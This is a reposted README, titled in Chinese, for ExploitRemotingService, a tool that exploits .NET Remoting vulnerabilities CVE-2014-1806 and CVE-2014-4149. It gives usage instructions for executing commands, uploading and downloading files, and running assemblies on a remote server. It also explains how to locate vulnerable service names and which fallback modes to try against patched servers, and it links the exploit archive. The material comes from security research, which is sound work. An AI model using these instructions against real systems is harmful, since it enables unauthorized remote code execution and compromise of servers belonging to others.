.NET 远程服务远程执行漏洞(exp) 中国寒龙收集整理首发

Source: https://github.com/tyranid/ExploitRemotingService

Exploit Database Mirror: http://www.exploit-db.com/sploits/35280.zip

ExploitRemotingService (c) 2014 James Forshaw


A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149.

It only works on Windows although some aspects _might_ work in Mono on *nix.

Usage Instructions:


ExploitRemotingService [options] uri command [command args]

Copyright (c) James Forshaw 2014


The supported URI are as follows:

tcp://host:port/ObjName   - TCP connection on host and portname

ipc://channel/ObjName     - Named pipe channel


-s, --secure               Enable secure mode

-p, --port=VALUE           Specify the local TCP port to listen on

-i, --ipc=VALUE            Specify listening pipe name for IPC channel

--user=VALUE           Specify username for secure mode

--pass=VALUE           Specify password for secure mode

--ver=VALUE            Specify version number for remote, 2 or 4

--usecom               Use DCOM backchannel instead of .NET remoting

--remname=VALUE        Specify the remote object name to register

-v, --verbose              Enable verbose debug output

--useser               Uses old serialization tricks, only works on

full type filter services

-h, -?, --help


exec [-wait] program [cmdline]: Execute a process on the hosting server

cmd  cmdline                  : Execute a command line process and display stdou


put  localfile remotefile     : Upload a file to the hosting server

get  remotefile localfile     : Download a file from the hosting server

ls   remotedir                : List a remote directory

run  file [args]              : Upload and execute an assembly, calls entry point

user                          : Print the current username

ver                           : Print the OS version

This tool supports exploit both TCP remoting services and local IPC services. To test

the exploit you need to know the name of the .NET remoting service and the port it‘‘s

listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find

this in the server or client code. Look for things like calls to:

RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance

You can then try the exploit by constructing an appropriate URL. If TCP you can use the

URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName.

A simple test is to do:

ExploitRemotingService SERVICEURL ver

If successful it should print the OS version of the hosting .NET remoting service. If

you get an exception it might be fixed with CVE-2014-1806. At this point try the COM

version using:

ExploitRemotingService -usecom SERVICEURL ver

This works best locally but can work remotely if you modify the COM configuration and

disable the firewall you should be able to get it to work. If that still doesn‘‘t work

then it might be an up to date server. Instead you can also try the full serialization

version using.

ExploitRemotingService -useser SERVICEURL ls c:\

For this to work the remoting service must be running with full typefilter mode enabled

(which is some, especially IPC services). It also only works with the commands ls, put

and get. But that should be enough to compromise a box.

I‘‘ve provided an example service to test against.


时间: 2024-12-23 22:12:40

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